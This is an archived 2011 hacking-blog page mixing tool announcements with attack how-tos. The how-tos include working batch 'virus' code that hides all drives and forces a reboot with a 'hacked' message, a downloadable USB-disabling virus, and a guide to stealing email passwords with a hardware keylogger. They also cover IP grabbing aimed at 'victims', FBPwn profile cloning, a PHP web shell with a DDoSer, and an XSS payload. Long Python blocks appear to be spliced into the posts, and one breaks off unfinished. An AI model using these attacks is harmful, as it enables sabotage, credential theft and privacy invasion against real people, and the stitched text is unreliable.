SYSTEM&WEB HACKING: September 2011

Friday, September 30, 2011

JonDo 00.16.001 Released - Automatic error recognition and easier usability

JonDos publishes a new version of the JonDo-Software, an IP changer and IP anonymization program, that you can use for anonymous surfing in the Internet with high security anonymous proxy servers.

What is JonDo?
JonDo is an open source and free-of-charge program for Windows, Linux and Mac OS X. It hides the user's IP address behind an anonymous IP address. In contrast to other anonymizers (VPNs, anonymous proxy servers), the user's anonymity stays protected even against the providers (operators) of the anonymous IP address.

What is new?
Statistics and support requests about the usage of JonDo suggest that several users of older versions do not use the software correctly, and may thereby surf the net unprotected. The current version warns the user in such a case and launches an assistant for fixing the problem if necessary. Of course, users may also consult the extensive online help for this purpose, use the forum or the e-mail support, or ask other users in the support chat. In any case, it is recommended to visit the IP Check in order to test your own configuration for weaknesses.

Moreover, several minor bugs and stability problems have been resolved, and the program's usability has been enhanced further. Because the servers will switch to new protocols within the next four weeks, older versions of JonDo will soon be unusable. For this reason too, users of earlier versions should update immediately, if possible.

Wednesday, September 28, 2011

Department of Homeland Security Releases Cyber Security Evaluation Tool (CSET)

The Cyber Security Evaluation Tool (CSET) is a Department of Homeland Security (DHS) product that assists organizations in protecting their key national cyber assets. It was developed under the direction of the DHS National Cyber Security Division (NCSD) by cybersecurity experts and with assistance from the National Institute of Standards and Technology. This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks. It includes both high-level and detailed questions related to all industrial control and IT systems. The tool is available for download, and the program also offers training and support at no cost to organizations engaged in administering networks that control facilities identified as being crucial to both the nation's economy and national security.

CSET is a desktop software tool that guides users through a step-by-step process to assess their control system and information technology network security practices against recognized industry standards. The output from CSET is a prioritized list of recommendations for improving the cybersecurity posture of the organization's enterprise and industrial control cyber systems. The tool derives the recommendations from a database of cybersecurity standards, guidelines, and practices. Each recommendation is linked to a set of actions that can be applied to enhance cybersecurity controls.

CSET has been designed for easy installation and use on a stand-alone laptop or workstation. It incorporates a variety of available standards from organizations such as National Institute of Standards and Technology (NIST), North American Electric Reliability Corporation (NERC), International Organization for Standardization (ISO), U.S. Department of Defense (DoD), and others. When the tool user selects one or more of the standards, CSET will open a set of questions to be answered. The answers to these questions will be compared against a selected security assurance level, and a detailed report will be generated to show areas for potential improvement. CSET provides an excellent means to perform a self-assessment of the security posture of your control system environment.

Key Benefits

  • CSET contributes to an organization's risk management and decision-making process
  • Raises awareness and facilitates discussion on cybersecurity within the organization
  • Highlights vulnerabilities in the organization's systems and provides recommendations on ways to address them
  • Identifies areas of strength and best practices being followed in the organization
  • Provides a method to systematically compare and monitor improvement in the cyber systems
  • Provides a common industry-wide tool for assessing cyber systems

Findmyhash - Find Cracked Hashes Online

findmyhash is a Python script which has been developed to look up different types of password hashes using multiple online cracking services. If it does not find a "cracked" hash, it will also present you with relevant Google search results.

This open source script can serve as a starting point for cracking any hash. It supports a great many online hash cracking services.
Cracking services supported by findmyhash:

  • Schwett.com
  • Netmd5crack.com
  • MD5-Cracker.tk
  • tools.BenRamsey.com
  • md5.Gromweb.com
  • md5.HashCracking.com
  • victorov.su
  • md5.thekaine.de
  • tmto.org
  • md5-db.de
  • md5.my-addr.com
  • md5pass.info
  • md5decryption.com
  • md5crack.com
  • md5online.net
  • md5-decrypter.com
  • authsecu.com
  • hashcrack.com
  • objectif-securite.ch
  • c0llision.net
  • md5.rednoize.com
  • cmd5.org
  • cacin.net
  • ibeast.com
  • password-decrypt.com
  • bigtrapeze.com
  • hashchecker.com
  • md5hashcracker.appspot.com
  • passcracking.com
  • askcheck.com
  • cracker.fox21.at
  • crackfoo.nicenamecrew.com
  • joomlaaa.com
  • md5-lookup.com
  • sha1-lookup.com
  • sha-256.sha1-lookup.com
  • ripemd-lookup.com
  • md5.com.cn
  • md5.digitalsun.pl
  • md5.drasen.net
  • md5.myinfosec.net
  • md5.net
  • md5.noisette.ch
  • md5hood.com
  • stringfunction.com
  • xanadrel.99k.org
  • isc.sans.edu
  • bokehman.com

Chances are, if this script does not find your hash, it might be unique and you will have to crack it! As of now, it supports the following nine hashing algorithms:

  • MD4
  • MD5
  • SHA1
  • SHA256
  • RMD160
  • MYSQL
  • CISCO7
  • LM
  • NTLM

This script has been duly tested with MD5, LM and NTLM hashes because they are the most common ones.
Download findmyhash
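A local check to run on whatever plaintext an online service claims for a hash, added here as an example (this is not findmyhash's own code): the candidate families are identified from the hash's shape, the way findmyhash chooses services, and then each family is recomputed locally so the claim is accepted only if it really reproduces the hash. It covers seven of the nine families the post lists (LM and Cisco type 7 are left out); a small MD4 is included because NTLM needs it and hashlib does not offer md4 on every build. The hash values in the block are well-known test vectors for the word "password".

```python
import hashlib
import re
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, s: int) -> int:
    return ((x << s) | (x >> (32 - s))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NTLM is MD4 over the UTF-16LE password."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(48):
            j = i % 16
            if i < 16:    # round 1: F, words 0..15, shifts 3 7 11 19
                f, k, s, add = (b & c) | (~b & d), j, (3, 7, 11, 19)[j % 4], 0
            elif i < 32:  # round 2: G, words 0 4 8 12 1 5 9 13 ..., shifts 3 5 9 13
                f = (b & c) | (b & d) | (c & d)
                k, s, add = (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:         # round 3: H, bit-reversed word order, shifts 3 9 11 15
                f = b ^ c ^ d
                k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[j]
                s, add = (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a = _rotl((a + f + x[k] + add) & MASK, s)
            a, b, c, d = d, a, b, c
        state = [(u + v) & MASK for u, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def identify(h: str) -> list:
    """Candidate families by shape alone; several families share a length."""
    h = h.strip()
    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", h):
        return ["MYSQL"]                       # MySQL 4.1+ PASSWORD() format
    if re.fullmatch(r"[0-9a-fA-F]{32}", h):
        return ["MD4", "MD5", "NTLM", "LM"]
    if re.fullmatch(r"[0-9a-fA-F]{40}", h):
        return ["SHA1", "RMD160"]
    if re.fullmatch(r"[0-9a-fA-F]{64}", h):
        return ["SHA256"]
    if re.fullmatch(r"(0[0-9]|1[0-5])([0-9a-fA-F]{2})+", h):
        return ["CISCO7"]                      # two-digit seed followed by hex pairs
    return []


def compute(family: str, candidate: str):
    """Recompute the hash of a candidate plaintext for one family; None if not done locally."""
    pw = candidate.encode("utf-8")
    if family == "MD4":
        return md4(pw).hex()
    if family == "MD5":
        return hashlib.md5(pw).hexdigest()
    if family == "SHA1":
        return hashlib.sha1(pw).hexdigest()
    if family == "SHA256":
        return hashlib.sha256(pw).hexdigest()
    if family == "NTLM":
        return md4(candidate.encode("utf-16-le")).hex()
    if family == "MYSQL":   # '*' + SHA1(SHA1(password)), upper-case hex
        return "*" + hashlib.sha1(hashlib.sha1(pw).digest()).hexdigest().upper()
    if family == "RMD160":
        try:
            return hashlib.new("ripemd160", pw).hexdigest()
        except ValueError:  # OpenSSL build without RIPEMD-160
            return None
    return None             # LM (DES-based) and Cisco type 7 are not recomputed here


def verify(hash_value: str, claimed_plaintext: str) -> list:
    """Families under which the claimed plaintext really produces hash_value (empty = reject)."""
    wanted = hash_value.strip().lower()
    matches = []
    for family in identify(hash_value):
        got = compute(family, claimed_plaintext)
        if got is not None and got.lower() == wanted:
            matches.append(family)
    return matches


if __name__ == "__main__":
    # Constructed lookup results: the hash asked about and the plaintext a service claimed for it.
    claims = [("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
              ("8846f7eaee8fb117ad06bdd830b7586c", "password"),
              ("5f4dcc3b5aa765d61d8327deb882cf99", "Password")]
    for h, pw in claims:
        print(h, identify(h), "->", verify(h, pw) or "claim does NOT reproduce the hash")
```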

iScanner - Tool to detect and remove malicious code and web page malware

iScanner is a free open source tool that lets you detect and remove malicious code and web page malware from your website easily and automatically. iScanner will not only show you the infected files on your server but is also able to clean these files by removing ONLY the malware code from the infected files.
Current Features:

  • Ability to scan one file, directory or remote web page / website.
  • Detect and remove website malware and malicious code in web pages. This includes hidden iframe tags, JavaScript, VBScript, ActiveX objects, suspicious PHP code and some known malware.
  • Extensive log shows the infected files and the malicious code.
  • Support for sending email reports.
  • Ability to clean the infected web pages automatically.
  • Easy backup and restore system for the infected files.
  • Simple and editable signature based database.
  • You can easily send a malicious file to the iScanner developers for analysis.
  • Ability to update the database and the program easily from iScanner's server.
  • Very flexible options and easy to use.
  • Fast scanner with great performance.
  • Yes, it's FREE!!

Monday, September 26, 2011

Ani-Shell v1.4 Released With Python Bind Shell, Anti-Crawler Feature and MD5 Cracker

Ani-Shell is a simple PHP shell with some unique features like a mass mailer, a simple web-server fuzzer, a DDoSer, an MD5 hash cracker, Python and PHP bind shells, anti-crawler features, etc.! This shell has immense capabilities and has been written with some coding standards in mind for better editing and customization!
New Features:

  • MD5 Hash Cracker
  • Python Bind-Shell
  • Anti-Crawler Function
  • Shell Support for some Older Servers
  • Better CSS
  • Whole New Logo

Ani-Shell Project Page : http://sourceforge.net/projects/ani-shell/
Ani-Shell Homepage : http://ani-shell.sourceforge.net/

Saturday, September 24, 2011

Pscan 2.0 - multi threaded TCP Syn port scanner

Multi-threaded TCP port scanner with the ability to scan all 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore it will tell you the MAC address of the target and the service running. For Linux and Windows.

Change Log
- Added option -s for Syn scan.
- Scanning made faster thanks to Syn scan
- Added even more default ports
- Improved error handler for Syn scan
- Improved text output
- Fixed minor bugs:
  - changed pathname to oui.txt and port-numbers.txt files
  - added missing call to cleanup function WSACleanup

Download multi threaded TCP Syn port scanner 2.0

Friday, September 23, 2011

How to crack or reset a BIOS password?

A BIOS password is usually used to protect the BIOS settings on a computer. Resetting it does not necessarily mean fiddling with the CMOS battery: with a little trick under DOS you can reset it as well. Here are 2 ways to reset the BIOS password:

1. Clear CMOS
I consider this the oldest and easiest way to get rid of a BIOS password. The steps are simple: first open the computer case. Then find the BIOS battery, which looks like a slightly larger watch battery. Look at the area around the battery: there is usually a jumper with 3 pins, 2 of them bridged and 1 left open.

Label the three pins 1 - 2 - 3. The bridge is usually in the 2-3 position. To reset the BIOS, move the jumper from pins 2-3 to pins 1-2 for about 5 seconds, then put it back in the starting position (2-3). Restart the computer; the BIOS password should be gone.

If that looks complicated, it is also easy to clear the CMOS by unplugging the BIOS battery and then putting it back. The consequence is that you break the warranty label on the BIOS battery.

2. Through DOS

First exit Windows by restarting your computer and starting it in MS-DOS mode, using the option "Command Prompt Only".

At the C:> prompt, type: DEBUG
and press Enter. You will see a dash (-), the DEBUG prompt. Then type:
o 70 2e
so that the DEBUG prompt shows -o 70 2e.
Press Enter and type:
o 71 ff
Press Enter, and finally type:
Q
Hit Enter; you will leave the DEBUG prompt and return to the C:> prompt.
Now restart your computer and see the result.

Thursday, September 22, 2011

Nmap 5.61TEST1 Released

This Nmap 5.61TEST1 is an informal test release with all of the latest features from the SVN. Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), and a utility for comparing scan results (Ndiff).

Wednesday, September 21, 2011

How to Hack passwords using Hardware Keylogger

Did you know that keyloggers are the simplest way to hack passwords? Today I'll be giving you detailed information on hardware keyloggers and their use. I will also teach how to hack passwords using a hardware keylogger.
A software keylogger (or simply keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.
Now I'll tell you what a hardware keylogger is and how it can be used for hacking an email.

Hardware keyloggers are used for keystroke logging, a method of capturing and recording computer users' keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral, so that victims never suspect that it is a keylogger. So by looking at its appearance it is not possible to identify it as a keylogger. Here are some images of hardware keyloggers for your convenience.
So by looking at the above images we can see that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify one as a keylogger.

Installing a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is, you just plug the keylogger into your keyboard's plug (PS/2 or USB) and then plug it into the PC socket. The following image shows how the keylogger is installed.
Once you install the hardware keylogger as shown in the above two images, the keylogger starts recording each and every keystroke of the keyboard, including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

Tuesday, September 20, 2011

BIOS based Virus discovered by Chinese Security Firm

The Chinese AV company 360 discovered a new Trojan, the "BMW Virus" (also called Mebromi), that can actually infect a computer's BIOS: "BMW 360 Security Center virus is the latest catch of a high-risk virus, the virus that infected a chain BIOS (motherboard chip program), MBR (master boot drive) and Windows system files, reinstall the system, regardless of the victim computer, format the hard disk, or replace the hard disk can not completely remove the virus.

It uses the CBROM command-line tool to hook its extension into the BIOS. The next time the system boots, the BIOS extension adds additional code to the hard drive's master boot record (MBR) in order to infect the winlogon.exe / winnt.exe processes on Windows XP and 2003 / Windows 2000 before Windows boots. The next time Windows launches, the malicious code downloads a rootkit to prevent the drive's MBR from being cleaned by a virus scanner. But even if the drive is cleaned, the whole infection routine is repeated the next time the BIOS module is booted. Mebromi can also survive a change of hard drive. If the computer doesn't use an Award BIOS, the contaminant simply infects the MBR.
If the system uses a BIOS other than Award, the Trojan skips trying to write to the BIOS, but still tries to infect the MBR of the boot hard drive. Removing the virus from the MBR and the infected files really has no effect, because as soon as the system is restarted, the BIOS is read and the computer is re-infected. Seemingly most antivirus companies will not want to create a BIOS cleaning utility; most likely the BIOS would need to be re-flashed to remove the virus infection completely.
[Source]

Thursday, September 15, 2011

McAfee DeepSAFE - Anti-rootkit Security Solution

McAfee previewed its DeepSAFE hardware-assisted security technology for proactively detecting and preventing stealthy advanced persistent threats (APTs) and malware. The technology, which was co-developed with Intel, sits below the OS, providing the ability to fundamentally change the security game, according to the companies. 

According to McAfee Labs, more than 1,200 new rootkits per day are detected - equating to 50 per hour every single day. The DeepSAFE technology, which was demonstrated at the Intel Developer Forum in San Francisco, was able to detect and stop a zero-day Agony rootkit from infecting a system in real time. This technology is expected to launch in products later in 2011.

Key attributes of McAfee DeepSAFE:

  • Builds the foundation for next-generation hardware-assisted security operating beyond the operating system
  • Provides a trusted view of system events below the operating system
  • Exposes many attacks that are undetectable today
  • New vantage point to block sophisticated stealth techniques and APTs
  • Provides real time CPU event monitoring with minimal performance impact
  • Combines the power of hardware and flexibility of software to deliver a new foundation for security.

"Intel and McAfee are working on joint technologies to better protect every segment across the compute continuum from PCs to devices," said Renée James, senior vice president and general manager of the Software and Services Group at Intel and the Chairman of McAfee. "By combining the features of existing Intel hardware and innovations in security software, Intel and McAfee are driving innovation in the security industry by providing a new way to protect computing devices. We are truly excited to introduce this technology upon which we will deliver new solutions."
[Source]

Monday, September 12, 2011

FBPwn : A Cross-Platform Facebook Profile Dumper tool

FBPwn is an open source, cross-platform, Java-based Facebook profile dumper. It can send friend requests to a list of Facebook profiles and poll for their acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder. It supports a lot of modules that can expand its current functionality, and it has a well-documented wiki page explaining the process of building an FBPwn module, though many modules already come prebuilt for your use.

All modules work on a selected profile URL (we’ll call him Bob), using a valid authenticated account (we’ll call him Mallory).

AddVictimFriends: Request to add some or all friends of Bob to increase the chance of Bob accepting any future requests, after he finds that you have common friends.

ProfileCloner: A list of all Bob’s friends is displayed, you choose one of them (we’ll call him Andy). FBPwn will change Mallory’s display picture, and basic info to match Andy’s. This will generate more chance that Bob accepts requests from Mallory as he thinks he is accepting from Andy. Eventually Bob will realize this is not Andy’s account, but probably it would be too late as all his info are already saved for offline checking by Mallory.

CheckFriendRequest: Checks whether Mallory is already a friend of Bob and, if so, just ends execution. If not, the module tries to add Bob as a friend and polls, waiting for him to accept. The module will not stop executing until the friend request is accepted.

DumpFriends: Accessible friends of Bob are saved for offline viewing. The output of the module depends on other modules: if Mallory is not a friend of Bob yet, the data might not be accessible and nothing will be dumped.

DumpImages: Accessible images (tagged and albums) are saved for offline viewing. The same limitations as DumpFriends apply.

DumpInfo: Accessible basic info is saved for offline viewing. The same limitations as DumpFriends apply.

As you can see, you can do almost everything that you could do manually with Facebook. People might use it for malicious purposes too, like cloning a Facebook profile. In addition to reading the official Facebook security guide, you need to avoid friend requests from unknown people.

Thursday, September 8, 2011

Registry Decoder - Digital Forensics Tool

Digital forensics deals with the analysis of artifacts on all types of digital devices. One of the most prevalent analysis techniques performed is that of the registry hives contained in Microsoft Windows operating systems. Registry Decoder was developed with the purpose of providing a single tool for the acquisition, analysis, and reporting of registry contents.

Tuesday, September 6, 2011

How to change the Windows 7 logon screen? (win tricks)

Are you bored of seeing the same logon screen? Do you want to change it?
Here is a trick to change the logon screen, for my friends :)

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key

HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
If Background does not exist, right-click LogonUI, select New and then Key, and name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background, select New and then DWORD, and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

DDOs Tracer - 1.0 Released

At most any time of the day, there's a distributed denial-of-service (DDOS) attack underway somewhere on the Internet. Yes, it's still true, despite reports that some ISPs have experienced fewer DDOS attacks overall during the last six months. It's a matter of quality, not quantity: "When DDOSes do occur, they are done with much greater purpose than they used to be," says Rodney Joffe, senior vice president and senior technologist for Neustar, a directory services and clearinghouse provider for the Internet industry. "They are usually to obscure what's [really] happening in the background."

So if you want to be safe and trace someone like a pro, here is the tool. It works by measuring the response time in milliseconds, and if the site goes down or just gets a lot of traffic it reports the time at which the attacker started the web attack. That is really useful, as you can report the attack and give the police more information, or just use the information for your host or home connection.


Monday, September 5, 2011

How to take ownership of a file in windows

If you are a Windows Vista user then you will know all about file ownership and permission-related issues, and now they have been extended to Windows 7 too.
Windows 7 has implemented an additional security mechanism to prevent accidental or intentional file or folder modification, by not allowing users other than the owner of the file or folder to access it. Hence if you need to access, modify or delete such files or folders you need to take ownership first and then assign rights or permissions to the respective users.
Taking ownership of system files or folders in Windows 7 or Vista is not a simple task. Whether you use the GUI or the command line, it takes far too many steps. Rizone Ownership will add a "Take Ownership" option under the Explorer right-click menu that handles all the steps for you. This menu option modifies the Discretionary Access Control Lists (DACLs). Simply put, it unlocks or takes ownership of a file or folder.

Sunday, September 4, 2011

How To Find Someones IP Address

1. Go to www.whatstheirip.com. The site will ask for your email. Enter your email and click “get links”.

2. You will be emailed a couple of links. The links when clicked will lead to a “page not found” and “invalid thread specified”. When one of the links is clicked it will email you back the IP of whoever clicked the link.

3. If it’s a victim that I have interaction with on a board or forum I always ask them “Is this you they are referring to in this thread”….the person invariably clicks the link and I’m emailed back their IP

Now that you have your victim's IP you are ready, and you can remotely shut down their computer or port scan them or do whatever your dirty mind can think of.

Batch Virus code to disable All Hard disk (part 13)

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDrives /t REG_DWORD /d 12

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoViewonDrive /t REG_DWORD /d 12

shutdown -r -c "Sorry Your System is hacked by hckr333.blogspot.com !" -f


Copy the program into Notepad and save it as a .bat file.


Go to part 12 of .bat virus programming (click here)

Saturday, September 3, 2011

A Virus Program to Disable USB Ports


In this post I will show how to create a simple virus that disables/blocks the USB ports on a computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C should be able to understand how this virus program works.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries, since I have also given a program to re-enable all the USB ports.

Step 1:
Download the file : http://www.mediafire.com/?7nmaxc5cs758827

Step 2:
You need to compile them before you can run them.

Step 3:
Upon compilation of block_usb.c you get block_usb.exe, a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

Step 4:
To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will not be detected. To re-enable the USB ports just run the unblock_usb.exe file (you need to compile unblock_usb.c). Now insert the pen drive and it should get detected.

Friday, September 2, 2011

Persistent XSS vulnerability in eBuddy Web Messenger

A team member from Virtual Luminous Security, Russian Federation, has discovered a persistent XSS vulnerability in eBuddy (the biggest web IM solution in the world) by transmitting messages with embedded encoded javascript code.
In-depth detail
eBuddy Web Messenger suffers from an encoded persistent XSS vulnerability in the messaging function (while sending a message with embedded code to another authorized user in eBuddy Web Messenger).
Exploit example
Plain XSS (Not going to store, nor execute)
<script>alert('eBuddy Persistent XSS');</script>
Encoded
text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E
[*] The attacker sends the encoded embedded code in an IM message.
[*] The victim receives the message with the encoded embedded code and it executes on the victims browser.
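The message flow the advisory describes, as an added example (this is not eBuddy's code): a constructed request body in the same text=... form is decoded server-side, then rendered to the recipient once verbatim (the vulnerable form) and once with HTML output encoding (the fix), plus a server-side check that flags decoded messages containing markup so they can be logged. All function names are assumptions.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed request body in the shape the advisory shows (text=<url-encoded message>).
SUBMITTED_BODY = "text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E"


def decode_text_param(body: str) -> str:
    """Server-side form decoding: the 'encoded' payload becomes plain markup here."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key == "text":
            return unquote_plus(value)
    return ""


def render_vulnerable(stored_message: str) -> str:
    """Stored message interpolated verbatim into the recipient's page: persistent XSS."""
    return '<div class="im">' + stored_message + "</div>"


def render_safe(stored_message: str) -> str:
    """Same template with HTML output encoding: the markup is displayed, never executed."""
    return '<div class="im">' + html.escape(stored_message, quote=True) + "</div>"


# A tag start (<script, </script, < img ...) or an inline event handler (onload=, onerror=).
TAG_OR_HANDLER = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.I)


def looks_like_markup(stored_message: str) -> bool:
    """Logging/alerting aid on the decoded text; it complements escaping, it does not replace it."""
    return TAG_OR_HANDLER.search(stored_message) is not None


if __name__ == "__main__":
    message = decode_text_param(SUBMITTED_BODY)
    print("decoded  :", message)
    print("vulnerable:", render_vulnerable(message))
    print("safe      :", render_safe(message))
    print("flagged   :", looks_like_markup(message))
```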

How Antivirus Software Works

Due to the ever increasing threat from viruses and other malicious programs, almost every computer today comes with antivirus software pre-installed. In fact, antivirus has become one of the most essential software packages for every computer. Even though every one of us has antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one of those few who would really like to understand how an antivirus works, then this article is for you.

How Antivirus Works

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

1. Signature-based detection (Dictionary approach)

This is the most commonly employed method; it involves searching for known patterns of viruses within a given file. Every antivirus product has a dictionary of sample malware code, called signatures, in its database. Whenever a file is examined, the antivirus refers to the dictionary of sample code in its database and compares it with the current file. If a piece of code within the file matches one in the dictionary, the file is flagged and proper action is taken immediately so as to stop the virus from replicating further. The antivirus may choose to repair the file, quarantine it or delete it permanently, based on its potential risk.
As new viruses and malware are created and released every day, this method of detection cannot defend against new malware unless samples are collected and signatures are released by the antivirus company. Some companies may also encourage users to upload new viruses or variants, so that the virus can be analyzed and the signature added to the dictionary.
Signature-based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence users must update their antivirus software on a regular basis so as to defend against the new threats that are released daily.

2. Heuristic-based detection (Suspicious behavior approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the more sophisticated antivirus products to identify new malware and variants of known malware. Unlike the signature-based approach, here the antivirus doesn't attempt to identify known viruses, but instead monitors the behavior of all programs.
For example, a malicious behavior such as a program trying to write data into an executable file is flagged and the user is alerted about this action. This method of detection gives an additional level of security against unidentified threats.
File emulation: This is another type of heuristic-based approach, where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine whether the program is malicious and carry out the necessary actions in order to clean the infection.
Most commercial antivirus products use a combination of both signature-based and heuristic-based approaches to combat malware.

Issues of concern

Zero-day threats: A zero-day (zero-hour) threat or attack is one where malware tries to exploit application vulnerabilities that are not yet known to the antivirus companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these new threats, they can easily bypass the antivirus software and carry out malicious actions. Most of these threats are identified within a day or two of their release, but the damage caused by them before identification is quite inevitable.
Daily Updates: Since new viruses and threats are released every day, it is essential to update the antivirus software so as to keep the virus definitions up to date. Most products have an auto-update feature so that the virus definitions are updated whenever the computer is connected to the Internet.
Effectiveness: Even though antivirus software can catch almost every malware sample, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also, virus authors have tried to stay a step ahead by writing "oligomorphic", "polymorphic" and, more recently, "metamorphic" virus code, which encrypts parts of itself or otherwise modifies itself as a method of disguise, so as not to match the virus signatures in the dictionary.
Thus user education is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of antivirus software.
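A small signature-plus-heuristic scanner, added here as an example that serves both the iScanner post above and this article (it is neither iScanner's code nor any vendor's engine): a constructed signature dictionary (one whole-file hash and byte patterns for the hidden iframe, JavaScript eval(unescape()) and PHP eval(base64_decode()) cases the iScanner post lists), a cleaner that strips only the matched spans as iScanner claims to, and a heuristic that still flags a rewritten variant which the byte signatures miss, which is the polymorphism point made above. Every sample page and signature is constructed for this example.

```python
import hashlib
import math
import re

# Signature dictionary constructed for this example (not iScanner's database, not a vendor's).
# Each entry pairs a name with a byte pattern that an infected page would carry.
PATTERN_SIGNATURES = {
    "hidden-iframe": re.compile(
        rb'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0["\']?[^>]*>.*?</iframe>', re.I | re.S),
    "js-eval-unescape": re.compile(rb'eval\s*\(\s*unescape\s*\([^)]*\)\s*\)\s*;?', re.I),
    "php-eval-base64": re.compile(rb'eval\s*\(\s*base64_decode\s*\([^)]*\)\s*\)\s*;?', re.I),
}

# Whole-file hash signature: the dictionary entry for a sample that was already analysed.
KNOWN_SAMPLE = b'<?php eval(base64_decode("ZWNobyAxOw==")); ?>'   # base64 of: echo 1;
HASH_SIGNATURES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "known-php-sample"}

SCRIPT_BODY = re.compile(rb"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ENCODED_RUN = re.compile(rb"(?:%[0-9a-f]{2}){16,}|(?:\\x[0-9a-f]{2}){16,}", re.I)


def scan(data: bytes) -> list:
    """Dictionary approach: exact hash match first, then the known byte patterns."""
    hits = []
    label = HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())
    if label:
        hits.append(label)
    for name, pattern in PATTERN_SIGNATURES.items():
        if pattern.search(data):
            hits.append(name)
    return hits


def _entropy(chunk: bytes) -> float:
    """Shannon entropy in bits per byte; packed or base64 payloads score high."""
    n = len(chunk)
    counts = {}
    for byte in chunk:
        counts[byte] = counts.get(byte, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def heuristic(data: bytes) -> list:
    """Suspicious-behaviour approach: judge what a script looks like, not which bytes it has."""
    reasons = []
    for body in SCRIPT_BODY.findall(data):
        if ENCODED_RUN.search(body):
            reasons.append("long percent/hex-encoded run inside <script>")
        if len(body) >= 64 and _entropy(body) > 5.0:
            reasons.append("high-entropy <script> body")
    return reasons


def clean(data: bytes):
    """Remove only the matched malicious spans, leaving the rest of the file untouched."""
    removed = []
    for pattern in PATTERN_SIGNATURES.values():
        data = pattern.sub(lambda m: removed.append(m.group(0)) or b"", data)
    return data, removed


# Constructed sample pages (not real infections).
CLEAN_PAGE = b"<html><body><h1>Welcome</h1><script>var x = 1 + 2;</script></body></html>"
PAYLOAD = b"%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%68%69%22%29%3b"  # document.write("hi");
INFECTED_PAGE = (
    b"<html><body><h1>Welcome</h1>"
    b'<iframe src="http://example.invalid/x" width="0" height="0"></iframe>'
    b"<script>eval(unescape('" + PAYLOAD + b"'));</script></body></html>"
)
# The same script rewritten so the literal eval(unescape( token is gone: the byte
# signatures miss it, the heuristic still flags the encoded run.
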